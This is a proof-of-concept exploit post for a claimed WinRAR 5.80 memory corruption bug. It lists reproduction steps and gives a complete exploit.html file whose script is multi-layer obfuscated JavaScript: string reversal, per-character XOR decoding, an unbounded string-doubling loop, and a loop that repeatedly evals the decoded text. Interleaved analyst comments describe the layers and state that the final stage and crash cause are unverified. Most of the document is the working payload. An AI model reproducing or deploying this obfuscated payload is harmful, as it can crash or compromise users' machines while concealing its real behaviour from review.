# Exploit Title: WinRAR memory corruption  
# Exploit Author: albalawi-s  
# Vendor Homepage: https://win-rar.com  
# Software Link: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe  
# Version: [5.80]  
# Tested on: [Microsoft Windows Version 10.0.18362.418 64bit]  
#https://twitter.com/test_app_______  
  
------------------------------------------------  
# poc video  
https://www.youtube.com/watch?v=NVDVP33kHuU  
  
# POC  
  
1- open winrar or any file.rar  
2- help  
3- help topics  
4- Drag the exploit.html to the window  
  
  
--------------------------------------------------  
Save the following content as exploit.html  
  
******************************************  
  
<script type="text/javascript">  
//<![CDATA[  
<!--  
// Analyst note: `x` is JavaScript source text, assembled by string
// concatenation, that the loop at the bottom passes to eval(). Nothing in this
// block is readable behaviour until the layers are unwrapped.
//
// What the visible text establishes:
//  - The outer layer defines f(x), which returns its argument with the
//    characters in reverse order, and calls it on the long literal.
//  - The tail of that literal, read right-to-left, is a second f(x) containing
//    `while(x.charCodeAt(l/13)!=47){try{x+=x;l+=l;}catch(e){}}`, i.e. a loop
//    that doubles the string on every pass and swallows any exception, followed
//    by another reversal and a substr() back to the original length.
//  - The escaped text near the start holds an f(x,y) that XORs each character
//    with a counter (`y%=127`, `y++`) via String.fromCharCode.
//
// NOTE(review): the fully decoded final stage is not shown on this page, and
// whether the doubling loop terminates cannot be determined from the literal
// alone, so which layer produces the reported crash is unverified.
// For triage, unwrap the layers statically (print each stage instead of
// evaluating it) inside an isolated analysis environment; do not let a
// script-enabled HTML renderer open the file.
var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +  
"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+  
"\\\\,l=x.length;for(i=0;i<l;i++){y%=127;o+=String.fromCharCode(x.charCodeAt" +  
"(i)^(y++));}return o;}f(\\\"\\\\K_RG^Q[B\\\\\\\\031OKSOYQP\\\\\\\\027b}*7))" +  
"x\\\\\\\\033:\\\\\\\\025$w!(:.p9&'$x3&-0,f\\\\\\\\000\\\\\\\\177&r\\\\\\\\0" +  
"25\\\\\\\\000O\\\\\\\\000\\\\\\\\013\\\\\\\\010\\\\\\\\026\\\\\\\\006\\\\\\" +  
"\\034\\\\\\\\000\\\\\\\\010\\\\\\\\007\\\\\\\\t1LO\\\\\\\\023\\\\\\\\036\\\\"+  
"\\\\034\\\\\\\\007\\\\\\\\021\\\\\\\\033\\\\\\\\002J$[3>AE\\\\\\\\\\\"\\\\\\"+  
"\\\\\\\\\"\\\\?^qXk:jm}k+dyz\\\\\\\\177=tcf}c+K:\\\\\\\\\\\\\\\\bkuo{l|\\\\" +  
"\\\\003\\\\\\\\002@KKRBF]\\\\\\\\027w\\\\\\\\016\\\\\\\\000\\\\\\\\037s\\\\" +  
"\\\\022\\\\\\\\017nAh[\\\\\\\\nUW]C\\\\\\\\005`ObQ|2!1-52g$($,9,)*m\\\\\\\\" +  
"rp\\\\\\\\005\\\\\\\\026\\\\\\\\0065%1).u\\\\\\\\0313=0\\\\\\\\004\\\\\\\\0" +  
"04>AZ9\\\\\\\\024;\\\\\\\\0065\\\\\\\\0307\\\\\\\\002MNO4\\\\\\\\030\\\\\\\\"+  
"037S\\\\\\\\007\\\\\\\\035\\\\\\\\032WX%\\\\\\\\010'\\\\\\\\022]^ Rgw$vnk(4" +  
"*H~ho{u^pyqvb?D;Mh\\\\\\\\177owoT\\\\\\\\017qKAIJ{\\\\\\\\n\\\\\\\\000\\\\\\"+  
"\\n\\\\\\\\013p_rA\\\\\\\\020\\\\\\\\021\\\\\\\\022pUYZ\\\\\\\\027KQV\\\\\\" +  
"\\025nHP\\\\\\\\027\\\\\\\\034c\\\\\\\\036a\\\\\\\\030g%*,g/3)\\\\\\\\021l\\"+  
"\\\\\\023r\\\\\\\\rpztu\\\\\\\\n%\\\\\\\\0047z{|\\\\\\\\016;+@\\\\\\\\022\\" +  
"\\\\\\n\\\\\\\\017DXF)\\\\\\\\007\\\\\\\\035\\\\\\\\002\\\\\\\\002\\\\\\\\0" +  
"02\\\\\\\\nNOPQ.\\\\\\\\001(\\\\\\\\033VWX%\\\\\\\\010'\\\\\\\\022AQsbpjtq8" +  
"[zUd7\\\\\\\\177n|f`e2gmes*D;n~di1uAWCPGWOW\\\\\\\\\\\\\\\\u\\\\\\\\010\\\\" +  
"\\\\025p_rAVD\\\\\\\\\\\\\\\\P@\\\\\\\\\\\\\\\\YY\\\\\\\\030\\\\\\\\\\\\\\\\"+  
"B\\\\\\\\023\\\\\\\\025\\\\\\\\035Ec2\\\\\\\\035,\\\\\\\\03703'5h+?-*(<omq\\"+  
"\\\\\\016q\\\\\\\\010wm\\\\\\\\013*\\\\\\\\0054\\\\\\\\007(;1-@I\\\\\\\\024" +  
"\\\\\\\\002\\\\\\\\026E\\\\\\\\017GUIZPL\\\\\\\\004NSPDBCDEFGCY\\\\\\\\023P" +  
"WT^{]p_jYr[|k\\\\\\\\177mjh|/;,2O6m\\\\\\\\\\\"\\\\&D;!GnApCT\\\\\\\\\\\\\\" +  
"\\~QxKzS^HX\\\\\\\\013NXHIUC\\\\\\\\000\\\\\\\\023\\\\\\\\t\\\\\\\\025TB^__" +  
"I\\\\\\\\007aLc.\\\\\\\\0356%+7fo!iwk|vn&pmrfdefgcy3pwt~$<\\\\\\\\023>\\\\\\"+  
"\\r8\\\\\\\\021:\\\\\\\\023\\\\\\\\n\\\\\\\\034\\\\\\\\014\\\\\\\\r\\\\\\\\" +  
"t\\\\\\\\037\\\\\\\\\\\\\\\\O[LR\\\\\\\\021\\\\\\\\001\\\\\\\\023\\\\\\\\02" +  
"0\\\\\\\\022\\\\\\\\nB&\\\\\\\\t \\\\\\\\023\\\\\\\\\\\"\\\\t|^qXkZslfi~ah`" +  
"{>e{gxp6*8{o}zxl-\\\\\\\\033}P\\\\\\\\177JXzUtG\\\\\\\\026\\\\\\\\004_N\\\\" +  
"\\\\\\\\\\\\F@E\\\\\\\\014\\\\\\\\017\\\\\\\\033]SV\\\\\\\\\\\\\\\\\\\\\\\\" +  
"007\\\\\\\\006YSYG\\\\\\\\037//.,%!{\\\\\\\\033j,2ce\\\\\\\\021lq\\\\\\\\01" +  
"4#\\\\\\\\016=hz7i\\\\\\\\004+\\\\\\\\0065`r<0\\\\\\\\004\\\\\\\\030\\\\\\\\"+  
"\\\\\\\\?\\\\\\\\0269\\\\\\\\010[G\\\\\\\\001\\\\\\\\036\\\\\\\\006\\\\\\\\" +  
"000SLFKAI\\\"\\\\,47)\\\"(f};)lo,0(rtsbus.o nruter};)i(tArahc.x=+o{)--i;0=>" +  
"i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)74=!)31/l(tAedoCrahc.x(elihw;lo=l,ht" +  
"gnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\")" ;  
// Each pass evaluates the current text of `x` and stores the result back in
// `x`; the loop ends only when an evaluation yields a falsy value. eval() of
// opaque, layered strings like this hides the real payload from static review
// and is itself a detection signal for content scanners.
while(x=eval(x));  
//-->  
//]]>  
</script>